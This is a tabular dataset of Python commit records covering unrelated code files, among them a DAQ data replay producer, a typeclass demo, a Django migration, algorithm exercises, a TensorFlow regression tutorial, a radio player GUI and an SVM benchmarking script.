commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
5466616a12d6044f7fcba95d0d513e51b4c4a23b | add silab_default_producer to examples which should run out-of-the-box for most SiLab DAQ systems | online_monitor/examples/producer_sim/silab_default_producer.py | online_monitor/examples/producer_sim/silab_default_producer.py | import time
import tables as tb
import zmq
from online_monitor.utils.producer_sim import ProducerSim
from online_monitor.utils import utils
class SiLabDefaultProducerSim(ProducerSim):
"""
Producer simulator reading standard SiLab DAQ system HDF5 data and replying it
"""
def setup_producer_device(self):
self.producer_delay = self.config.get('delay', 0.1) # Delay in seconds
return super(SiLabDefaultProducerSim, self).setup_producer_device()
def pack_and_enc(self, data, meta, scan_params=None, name=''):
# Generate meta data dict from numpy structured array
meta_data = {}
for key in meta.dtype.names:
# Convert numpy dtype to native Python using e.g. np.int64.item()-method if possible
try:
meta_data[key] = meta[key].item()
except AttributeError:
meta_data[key] = meta[key]
if "error" in key:
meta_data['readout_error'] = meta_data[key]
# Add desscriptor of data dtype
meta_data['name'] = self.kind if name == '' else name
meta_data['dtype'] = str(data.dtype)
meta_data['scan_parameters'] = {} if scan_params is None else scan_params
# Encode and return
return utils.simple_enc(data=data, meta=meta_data)
def send_data(self):
for raw_data, meta_data, scan_params in self._get_chunks():
try:
ser = self.pack_and_enc(data=raw_data, meta=meta_data, scan_params=scan_params)
self.sender.send(ser, flags=zmq.NOBLOCK) # PyZMQ supports sending numpy arrays without copying any data
except zmq.Again:
pass
time.sleep(self.producer_delay)
def _get_chunks(self):
with tb.open_file(self.config['data_file'], mode='r') as data_file:
required_nodes = ('raw_data', 'meta_data')
missing_nodes = [r for r in required_nodes if r not in data_file.root]
if missing_nodes:
raise RuntimeError(f"Some root nodes are required but not present in {self.config['data_file']}: {', '.join(missing_nodes)} missing!")
# Extract meta data and determine number of readouts
meta_data = data_file.root.meta_data[:]
n_readouts = len(meta_data)
# Get data handle
raw_data = data_file.root.raw_data
# Optional scan params
try:
scan_params = data_file.root.scan_parameters
scan_param_names = scan_params.dtype.names
except tb.NoSuchNodeError:
scan_params = None
self.last_readout_time = time.time()
for i in range(n_readouts):
# This readouts meta data
meta = meta_data[i]
# Raw data indeces of readout
i_start = meta['index_start']
i_stop = meta['index_stop']
# get current slice of data
raw = raw_data[i_start:i_stop]
# Time stamp of readout
t_start = meta['timestamp_start']
# Make a chunk
if scan_params is not None:
chunk = (raw, meta, {str(scan_param_names): scan_params[i]})
else:
chunk = (raw, meta, {})
# Replay timings
# Determine replay delays
if i == 0: # Initialize on first readout
self.last_timestamp_start = t_start
now = time.time()
delay = now - self.last_readout_time
additional_delay = t_start - self.last_timestamp_start - delay
if additional_delay > 0:
# Wait if send too fast, especially needed when readout was
# stopped during data taking (e.g. for mask shifting)
time.sleep(additional_delay)
self.last_readout_time = time.time()
self.last_timestamp_start = t_start
yield chunk
| Python | 0 | |
ca25a4e2aedd657a10c7bfa2849f9f3d16f5ee9f | Add Eq demo | demo/eq.py | demo/eq.py | # typeclasses, an educational implementation of Haskell-style type
# classes, in Python
#
# Copyright (C) 2010 Nicolas Trangez <eikke eikke com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, version 2.1
# of the License.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA
'''Some demonstrations of the Eq typeclass and its `eq` and `ne` functions'''
from typeclasses.eq import eq, ne
import typeclasses.instances.list
import typeclasses.instances.tuple
from typeclasses.instances.maybe import Just, Nothing
from typeclasses.instances.tree import Branch, Leaf
# List
assert eq([1, 2, 3], [1, 2, 3])
assert ne([0, 1, 2], [1, 2, 3])
# Tuple
assert eq((1, 2, 3, ), (1, 2, 3, ))
assert ne((0, 1, 2, ), (1, 2, 3, ))
# Maybe
assert eq(Nothing, Nothing)
assert eq(Just(1), Just(1))
assert ne(Just(1), Just(2))
assert ne(Just(1), Nothing)
# Tree
assert eq(Branch(Branch(Leaf(0), Leaf(1)), Leaf(2)),
Branch(Branch(Leaf(0), Leaf(1)), Leaf(2)))
assert ne(Branch(Branch(Leaf(0), Leaf(1)), Leaf(2)),
Branch(Branch(Leaf(0), Leaf(1)), Branch(Leaf(2), Leaf(3))))
| Python | 0.000001 | |
176ab29c5f0506d5ba94a2676b81f34f7e2a6b3b | Add migration for expiration_date change (#28) | groups_manager/migrations/0005_auto_20181001_1009.py | groups_manager/migrations/0005_auto_20181001_1009.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2018-10-01 10:09
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('groups_manager', '0004_0_6_0_groupmember_expiration_date'),
]
operations = [
migrations.AlterField(
model_name='groupmember',
name='expiration_date',
field=models.DateTimeField(blank=True, default=None, null=True),
),
]
| Python | 0.000002 | |
7043c46624df6f1899df9fc58e1a8631fc67f43d | add log.py | pprof/log.py | pprof/log.py | #!/usr/bin/env python
# encoding: utf-8
""" Analyze the PPROF database. """
from plumbum import cli
from pprof.driver import PollyProfiling
def print_runs(query):
""" Print all rows in this result query. """
if query is None:
return
for tup in query:
print("{} @ {} - {} id: {} group: {}".format(
tup.finished,
tup.experiment_name, tup.project_name,
tup.experiment_group, tup.run_group))
def print_logs(query, types=None):
""" Print status logs. """
from pprof.utils.schema import RunLog
if query is None:
return
query = query.filter(RunLog.status != 0)
for run, log in query:
print("{} @ {} - {} id: {} group: {} status: {}".format(
run.finished, run.experiment_name, run.project_name,
run.experiment_group, run.run_group,
log.status))
if "stderr" in types:
print "StdErr:"
print(log.stderr)
if "stdout" in types:
print "StdOut:"
print(log.stdout)
print
@PollyProfiling.subcommand("log")
class PprofLog(cli.Application):
""" Frontend command to the pprof database. """
@cli.switch(["-E", "--experiment"], str, list=True,
help="Experiments to fetch the log for.")
def experiment(self, experiments):
""" Set the experiments to fetch the log for. """
self._experiments = experiments
@cli.switch(["-e", "--experiment-id"], str, list=True,
help="Experiment IDs to fetch the log for.")
def experiment_ids(self, experiment_ids):
""" Set the experiment ids to fetch the log for. """
self._experiment_ids = experiment_ids
@cli.switch(["-P", "--project"], str, list=True,
help="Projects to fetch the log for.")
def project(self, projects):
""" Set the projects to fetch the log for. """
self._projects = projects
@cli.switch(["-p", "--project-id"], str, list=True,
help="Project IDs to fetch the log for.")
def project_ids(self, project_ids):
""" Set the project ids to fetch the log for. """
self._project_ids = project_ids
@cli.switch(["-t", "--type"], cli.Set("stdout", "stderr"), list=True,
help="Set the output types to print.")
def log_type(self, types):
""" Set the output types to print. """
self._types = types
_experiments = None
_experiment_ids = None
_projects = None
_project_ids = None
_types = None
def main(self):
""" Run the log command. """
from pprof.utils.schema import Session, Run, RunLog
s = Session()
exps = self._experiments
exp_ids = self._experiment_ids
projects = self._projects
project_ids = self._project_ids
types = self._types
if types is not None:
query = s.query(Run, RunLog).filter(Run.id == RunLog.run_id)
else:
query = s.query(Run)
if exps is not None:
query = query.filter(Run.experiment_name.in_(exps))
if exp_ids is not None:
query = query.filter(Run.experiment_group.in_(exp_ids))
if projects is not None:
query = query.filter(Run.project_name.in_(projects))
if project_ids is not None:
query = query.filter(Run.run_group.in_(project_ids))
if types is not None:
print_logs(query, types)
else:
print_runs(query)
| Python | 0.000024 | |
caa92a302f3dcc6ed084ebc9f20db28c63d48d29 | Add missing file | irrigator_pro/uga/aggregates.py | irrigator_pro/uga/aggregates.py | from django.db import connections
from django.db.models.aggregates import Aggregate
from django.db.models.sql.aggregates import Aggregate as SQLAggregate
from uga.models import UGAProbeData
__initialized__ = False
class SimpleAggregate(Aggregate):
def add_to_query(self, query, alias, col, source, is_summary):
aggregate = SQLAggregate(col, source=source, is_summary=is_summary, **self.extra)
aggregate.sql_function = self.sql_function
aggregate.is_ordinal = getattr(self, 'is_ordinal', False)
aggregate.is_computed = getattr(self, 'is_computed', False)
if hasattr(self, 'sql_template'):
aggregate.sql_template = self.sql_template
query.aggregates[alias] = aggregate
class Date(SimpleAggregate):
sql_function = 'Date'
name = 'Date'
| Python | 0.000006 | |
253cda3fc9d377dc64fe4b67b5fe55f911c8693f | Add startsliver script. | protogeni/test/startsliver.py | protogeni/test/startsliver.py | #! /usr/bin/env python
#
# GENIPUBLIC-COPYRIGHT
# Copyright (c) 2008-2009 University of Utah and the Flux Group.
# All rights reserved.
#
# Permission to use, copy, modify and distribute this software is hereby
# granted provided that (1) source code retains these copyright, permission,
# and disclaimer notices, and (2) redistributions including binaries
# reproduce the notices in supporting documentation.
#
# THE UNIVERSITY OF UTAH ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS"
# CONDITION. THE UNIVERSITY OF UTAH DISCLAIMS ANY LIABILITY OF ANY KIND
# FOR ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE.
#
#
#
import sys
import pwd
import getopt
import os
import time
import re
import xmlrpclib
from M2Crypto import X509
ACCEPTSLICENAME=1
execfile( "test-common.py" )
#
# Get a credential for myself, that allows me to do things at the SA.
#
mycredential = get_self_credential()
print "Got my SA credential"
#
# Lookup slice
#
myslice = resolve_slice( SLICENAME, mycredential )
print "Found the slice, asking for a credential ..."
#
# Get the slice credential.
#
slicecred = get_slice_credential( myslice, mycredential )
print "Got the slice credential, asking for a sliver credential ..."
#
# Get the sliver credential.
#
params = {}
params["credential"] = slicecred
rval,response = do_method("cm", "GetSliver", params)
if rval:
Fatal("Could not get Sliver credential")
pass
slivercred = response["value"]
print "Got the sliver credential, starting the sliver";
#
# Start the sliver.
#
params = {}
params["credential"] = slivercred
rval,response = do_method("cm", "StartSliver", params)
if rval:
Fatal("Could not start sliver")
pass
print "Sliver has been started ..."
| Python | 0 | |
aa88f2b64c8c2837022ee020862ec2c0a9a6e7ad | Add fabfile for generating docs in gh-pages branch. | fabfile.py | fabfile.py | from __future__ import with_statement
import os
from fabric.api import abort, local, task, lcd
@task(default=True)
def docs(clean='no', browse_='no'):
with lcd('docs'):
local('make clean html')
temp_path = "/tmp/openxc-python-docs"
docs_path = "%s/docs/_build/html" % local("pwd", capture=True)
local('rm -rf %s' % temp_path)
os.makedirs(temp_path)
with lcd(temp_path):
local('cp -R %s %s' % (docs_path, temp_path))
local('git checkout gh-pages')
local('cp -R %s/html/* .' % temp_path)
local('touch .nojekyll')
local('git add -A')
local('git commit -m "Update Sphinx docs."')
local('git push')
local('git checkout master')
@task
def browse():
"""
Open the current dev docs in a browser tab.
"""
local("$BROWSER docs/_build/html/index.html")
@task(default=True)
def test(args=None):
local("tox")
@task
def upload():
"""
Build, register and upload to PyPI
"""
puts("Uploading to PyPI")
local('python setup.py sdist register upload')
| Python | 0 | |
1e4f86f3184d0ae09d2a14690257ba9d4c44edb1 | remove dups (local sequence alignments) | repertoire/collapse_reads.py | repertoire/collapse_reads.py | #!/usr/bin/env python
# encoding: utf-8
"""
matches = pairwise2.align.localms(target, query, 1, -1, -3, -2)
try:
# highest scoring match first
return int(matches[0][3])
except IndexError:
"""
import sys
from toolshed import nopen
from parsers import read_fastx
from Bio import pairwise2
from collections import OrderedDict
def fastq_to_dict(fastq):
"""docstring for fastq_to_dict"""
d = {}
with nopen(fastq) as fh:
for name, seq, qual in read_fastx(fh):
d[name] = {'seq':seq,'qual':qual}
return d
def main(args):
fd = fastq_to_dict(args.fastq)
# convert to ordered dictionary
fd = OrderedDict(sorted(fd.items(), key=lambda (k, v): len(v['seq'])))
seen = {}
for i, (name, query) in enumerate(fd.iteritems(), start=1):
if i % 1000 == 0:
print >> sys.stderr, ">> processed %d reads..." % i
subseq = False
q_id, q_cregion, q_fwork = name.split(":")
expected_score = len(query['seq']) - args.mismatches
# maps onto same length or longer seqs
for t_name, target in fd.iteritems():
if t_name == name: continue
# skipping reads we've already mapped
if seen.has_key(t_name): continue
t_id, t_cregion, t_fwork = t_name.split(":")
# only attempt to collapse things of the same c-region and framework
if q_cregion != t_cregion and q_fwork != t_fwork: continue
# locally align using smith-waterman
matches = pairwise2.align.localms(target['seq'], query['seq'], 1, -1, -1, -1)
high_score = matches[0][2]
if high_score == expected_score:
subseq = True
break
if not subseq:
# print fastq record
print "@%s\n%s\n+\n%s" % (name, query['seq'], query['qual'])
seen[name] = ""
if __name__ == '__main__':
import argparse
p = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
p.add_argument('fastq', help="reads to collapse to unique")
p.add_argument('-m', '--mismatches', type=int, default=0,
help="mismatches to allow during mapping [ %(default)s ]")
main(p.parse_args()) | Python | 0 | |
736093f945ff53c4fe6d9d8d2e0c4afc28d9ace3 | Add answer to leetcode rotate list | chimera/py/leetcode_rotate_list.py | chimera/py/leetcode_rotate_list.py | # coding=utf-8
"""
chimera.leetcode_rotate_list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Given a list, rotate the list to the right by k places, where k is
non-negative.
For example:
Given 1->2->3->4->5->NULL and k = 2,
return 4->5->1->2->3->NULL.
"""
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def rotateRight(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
if not head:
return head
tail = p = head
n = 0
while tail:
n += 1
p = tail
tail = tail.next
p.next = head
rotate = k % n
for i in xrange(n - rotate):
p = head
head = head.next
p.next = None
return head
| Python | 0.000002 | |
22bb91cfc1b1dc637e33625dcbaf3e8499b384ec | Add LinearRegression.py | 1-LinearRegression/LinearRegression.py | 1-LinearRegression/LinearRegression.py | import tensorflow as tf
# TensorFlow Example (1) - Linear Regression
#
# (model) y = ax + b
# By giving some pairs of (x, y) that satisfies the given model,
# TensorFlow can compute the value of 'a' and 'b'
# by using very simple Machine Learning(ML) algorithm.
# 1. implementing our model.
# TensorFlow has an element called 'node'.
# A 'node' can be formed from a Tensor(i.e. values),
# or by combining nodes with arithmetic operations.
# We should implement our model (y = ax + b) first.
# There are a few types of values.
# 1. constants: values which cannot change.
# 2. placeholders: values that we should give when computing.
# 3. variables: values that can be changed while computing.
# therefore, in our model y = ax + b
# 'x' is given by us so it should be 'placeholder',
# and 'a' and 'b' is computed by TensorFlow, which therefore
# should be variables.
x = tf.placeholder(tf.float32)
a = tf.Variable([1.0], tf.float32)
b = tf.Variable([1.0]) # data type inferred automatically
model_y = a * x + b # same with 'y = tf.add(tf.multiply(a, x), b)'
# 2. let the computer know our goal.
# To compute 'a' and 'b' value using ML,
# we should let machine know what is their goal.
# in this case, the computation result of the model should be
# the same with real value(which is given by us.)
# to accomplish this goal, we design a function(which is called
# 'loss function'), and the goal of the machine is to minimize
# the value of loss function.
real_y = tf.placeholder(tf.float32)
error = model_y - real_y
squared_error = tf.square(error) # make all errors positive to compute average
sum_error = tf.reduce_sum(squared_error) # this is our loss function whose value should be minimized.
# 3. compute 'a' and 'b' value using ML.
# now we designed our model and the goal of the machine.
# therefore, now what we have to do is just command the machine
# to find the value 'a' and 'b' that minimizes our loss function(sum_error)
# to do that, we give our machine some data sets.
# (the exact (x, y) pairs to compute 'a' and 'b' values.
x_training_data = [1, 2, 3, 4]
y_training_data = [3, 5, 7, 9] # y = 2x + 1 is the correct model
# to run a TensorFlow computation, we need something called 'Session'.
session = tf.Session()
# first, make all the Variables to be set to its initial value(which are wrong)
session.run(tf.global_variables_initializer())
# then, make machine to compute the right 'a' and 'b' value.
optimizer = tf.train.GradientDescentOptimizer(0.01) # Machine's algorithm to find 'a' and 'b'
train = optimizer.minimize(sum_error)
for _ in range(10000):
session.run(train, {x: x_training_data, real_y: y_training_data})
# 4. Machine finished computing 'a' and 'b' value.
# this code below will print out that values.
a, b = session.run([a, b])
print("a :", a)
print("b :", b)
| Python | 0.000295 | |
08d7e10d74297f16e4bcb5cfb7de0749d9d101bc | add missing fiel | codeskel/localcommands/__init__.py | codeskel/localcommands/__init__.py | Python | 0.000006 | ||
0c289af5ef7f26796bdc4b4183f456074f7440f7 | Create dijkstra.py | 3-AlgorithmsOnGraphs/Week4/dijkstra/dijkstra.py | 3-AlgorithmsOnGraphs/Week4/dijkstra/dijkstra.py | #Uses python3
import sys
import queue
def Dijkstra(adj, s, cost, t):
dist = list()
prev = list()
inf = 0
for c in cost:
inf += sum(c)
inf += 1
for u in range(0, len(adj)):
dist.append(inf)
prev.append(None)
dist[s] = 0
H = queue.PriorityQueue()
for i, d in enumerate(dist):
H.put((d, i))
processed = set()
while not H.empty():
u = H.get()[1]
if u in processed:
pass
for i, v in enumerate(adj[u]):
if dist[v] > dist[u] + cost[u][i]:
dist[v] = dist[u] + cost[u][i]
prev[v] = u
H.put((dist[v], v))
processed.add(v)
if dist[t]< inf:
return dist[t]
else:
return -1
def distance(adj, cost, s, t):
return Dijkstra(adj, s, cost, t)
if __name__ == '__main__':
# input = sys.stdin.read()
with open('test', 'r') as f:
input = f.read()
data = list(map(int, input.split()))
n, m = data[0:2]
data = data[2:]
edges = list(zip(zip(data[0:(3 * m):3], data[1:(3 * m):3]), data[2:(3 * m):3]))
data = data[3 * m:]
adj = [[] for _ in range(n)]
cost = [[] for _ in range(n)]
for ((a, b), w) in edges:
adj[a - 1].append(b - 1)
cost[a - 1].append(w)
s, t = data[0] - 1, data[1] - 1
print(distance(adj, cost, s, t))
| Python | 0.000001 | |
26ae4b857780ba8d5ecfbd8c8cab39452f086e58 | add conf.py for docs (test) | docs/conf.py | docs/conf.py | # -*- coding: utf-8 -*-
#
# bazooka documentation build configuration file, created by
# sphinx-quickstart on Tue Mar 3 13:34:12 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.md'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bazooka'
copyright = u'2015, Bazooka-ci team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'master'
# The full version, including alpha/beta/rc tags.
release = 'master'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bazookadoc'
| Python | 0 | |
18e8cee5c19329dac7e931cb00e67f8d19e3f89d | add script `compare_win_set` | examples/bunny/compare_win_set.py | examples/bunny/compare_win_set.py | from dd import cudd
b = cudd.BDD()
u_gr1x = cudd.load('winning_set', b)
u_slugs = b.load('winning_set_bdd.txt')
env_action_slugs = b.load('env_action_slugs.txt')
sys_action_slugs = b.load('sys_action_slugs.txt')
assumption_0_slugs = b.load('assumption_0_slugs.txt')
goal_0_slugs = b.load('goal_0_slugs.txt')
env_action_gr1x = b.load('env_action_gr1x.txt')
sys_action_gr1x = b.load('sys_action_gr1x.txt')
assumption_0_gr1x = b.load('assumption_0_gr1x.txt')
goal_0_gr1x = b.load('goal_0_gr1x.txt')
assert env_action_slugs == env_action_gr1x
assert sys_action_slugs == sys_action_gr1x
assert assumption_0_slugs == assumption_0_gr1x
assert goal_0_slugs == goal_0_gr1x
if u_gr1x == u_slugs:
print('Winning set is the same.')
else:
print('Different winning sets!')
del u_gr1x, u_slugs
| Python | 0 | |
46bcea5a4c1a46cd7e458fa5fd7b761bbea25b4f | add a RAI radio player | rai_radio.py | rai_radio.py | #!/usr/bin/env python
import sys
from PySide.QtCore import *
from PySide.QtGui import *
from pprint import pprint
import subprocess
import argparse
# URL list taken from http://www.rai.it/dl/portale/info_radio.html
STATIONS = [
['Radio 1', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=162834'],
['Radio 2', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=162063'],
['Radio 3', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=162841'],
['Filodiffusione 4', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173799'],
['Filodiffusione 5', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173832'],
['Isoradio', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173875'],
['Gr Parlamento', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173879'],
['Rai Italia Radio', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173887'],
['Web Radio WR6', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=174078'],
['Web Radio WR7', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=174083'],
['Web Radio WR8', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=174086 '],
]
WIN_TITLE = "RAI radio"
class Win(QMainWindow):
def __init__(self, parent=None):
super(Win, self).__init__(parent)
self.player = None
# args
parser = argparse.ArgumentParser(description='BBC radio player')
parser.add_argument('-p', '--player', default='vlc')
parser.add_argument('player_args', nargs='*')
args = parser.parse_args()
self.player_prog = args.player
self.player_args = args.player_args
# UI
self.setWindowTitle(WIN_TITLE)
self.setMinimumSize(300, 600)
self.scroll_area = QScrollArea()
self.widget = QWidget()
self.layout = QVBoxLayout()
self.widget.setLayout(self.layout)
self.scroll_area.setWidgetResizable(True)
self.scroll_area.setWidget(self.widget)
self.setCentralWidget(self.scroll_area)
for name, url in STATIONS:
button = QPushButton(name.replace('&', '&&'))
button.args = {
'name': name,
'url': url,
}
button.clicked.connect(self.listen)
self.layout.addWidget(button)
# timer
self.timer = QTimer()
self.timer.timeout.connect(self.check_player)
def listen(self):
pressed_button = self.sender()
for button in self.widget.findChildren(QPushButton):
if button != pressed_button and not button.isEnabled():
button.setEnabled(True)
break
pressed_button.setEnabled(False)
# stop the running player instance before starting another one
if self.player:
if self.player.poll() is None:
self.player.terminate()
self.player.wait()
cmd = [self.player_prog]
cmd.extend(self.player_args)
cmd.append(pressed_button.args['url'])
try:
self.player = subprocess.Popen(cmd)
except Exception, e:
msg_box = QMessageBox()
msg_box.setText('Couldn\'t launch\n"%s"' % ' '.join(cmd))
msg_box.setInformativeText(unicode(e))
msg_box.exec_()
pressed_button.setEnabled(True)
self.setWindowTitle('%s - %s' % (pressed_button.args['name'], WIN_TITLE))
self.timer.start(200)
def check_player(self):
if self.player and self.player.poll() is not None:
# the player has been stopped
self.player = None
self.timer.stop()
self.setWindowTitle(WIN_TITLE)
for button in self.widget.findChildren(QPushButton):
if not button.isEnabled():
button.setEnabled(True)
break
if __name__ == '__main__':
app = QApplication(sys.argv)
win = Win()
win.show()
sys.exit(app.exec_())
| Python | 0.000001 | |
f4e4d2781662f7f8c38b12aacc5ad0fca6e1b4da | add comparison with svm^struct on multiclass data | examples/multiclass_comparision_svm_struct.py | examples/multiclass_comparision_svm_struct.py | """
==================================================================
Comparing PyStruct and SVM-Struct for multi-class classification
==================================================================
This example compares the performance of pystruct and SVM^struct on a
multi-class problem.
For the example to work, you need to install SVM^multiclass and
set the path in this file.
We are not using SVM^python, as that would be much slower, and we would
need to implement our own model in a SVM^python compatible way.
Instead, we just call the SVM^multiclass binary.
This comparison is only meaningful in the sense that both libraries
use general structured prediction solvers to solve the task.
The specialized implementation of the Crammer-Singer SVM in LibLinear
is much faster than either one.
The plots are adjusted to disregard the time spend in writing
the data to the file for use with SVM^struct. As this time is
machine dependent, the plots are only approximate (unless you measure
that time for your machine and re-adjust)
"""
import tempfile
import os
from time import time
import numpy as np
from sklearn.datasets import dump_svmlight_file
from sklearn.datasets import fetch_mldata, load_iris, load_digits
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
from pystruct.models import CrammerSingerSVMModel
from pystruct.learners import OneSlackSSVM
# please set the path to the svm-struct multiclass binaries here
svmstruct_path = "/home/local/lamueller/tools/svm_multiclass/"
class MultiSVM():
"""scikit-learn compatible interface for SVM^multi.
Dumps the data to a file and calls the binary.
"""
def __init__(self, C=1.):
self.C = C
def fit(self, X, y):
self.model_file = tempfile.mktemp(suffix='.svm')
train_data_file = tempfile.mktemp(suffix='.svm_dat')
dump_svmlight_file(X, y + 1, train_data_file, zero_based=False)
C = self.C * 100. * len(X)
os.system(svmstruct_path + "svm_multiclass_learn -c %f %s %s"
% (C, train_data_file, self.model_file))
def _predict(self, X, y=None):
if y is None:
y = np.ones(len(X))
train_data_file = tempfile.mktemp(suffix='.svm_dat')
dump_svmlight_file(X, y, train_data_file, zero_based=False)
prediction_file = tempfile.mktemp(suffix='.out')
os.system(svmstruct_path + "svm_multiclass_classify %s %s %s"
% (train_data_file, self.model_file, prediction_file))
return np.loadtxt(prediction_file)
def predict(self, X):
return self._predict(X)[:, 0] - 1
def score(self, X, y):
y_pred = self.predict(X)
return accuracy_score(y, y_pred)
def decision_function(self, X):
return self._predict(X)[:, 1:]
def eval_on_data(X, y, svm, Cs):
accuracies, times = [], []
for C in Cs:
svm.C = C
start = time()
svm.fit(X, y)
times.append(time() - start)
accuracies.append(accuracy_score(y, svm.predict(X)))
return accuracies, times
def plot_timings(times_svmstruct, times_pystruct, dataset="usps"):
plt.figure()
plt.figsize(4, 3)
plt.plot(times_svmstruct, ":", label="SVM^struct", c='blue')
plt.plot(times_pystruct, "-.", label="PyStruct", c='red')
plt.xlabel("C")
plt.xticks(np.arange(len(Cs)), Cs)
plt.ylabel("learning time (s)")
plt.legend(loc='best')
plt.savefig("timings_%s.pdf" % dataset, bbox_inches='tight')
if __name__ == "__main__":
Cs = 10. ** np.arange(-4, 1)
multisvm = MultiSVM()
svm = OneSlackSSVM(CrammerSingerSVMModel(tol=0.001))
iris = load_iris()
X, y = iris.data, iris.target
accs_pystruct, times_pystruct = eval_on_data(X, y, svm, Cs=Cs)
accs_svmstruct, times_svmstruct = eval_on_data(X, y, multisvm, Cs=Cs)
# the adjustment of 0.01 is for the time spent writing the file, see above.
plot_timings(np.array(times_svmstruct) - 0.01, times_pystruct,
dataset="iris")
digits = load_digits()
X, y = digits.data / 16., digits.target
accs_pystruct, times_pystruct = eval_on_data(X, y, Cs=Cs)
accs_svmstruct, times_svmstruct = eval_on_data(X, y, MultiSVM(), Cs=Cs)
plot_timings(np.array(times_svmstruct) - 0.85, times_pystruct,
dataset="digits")
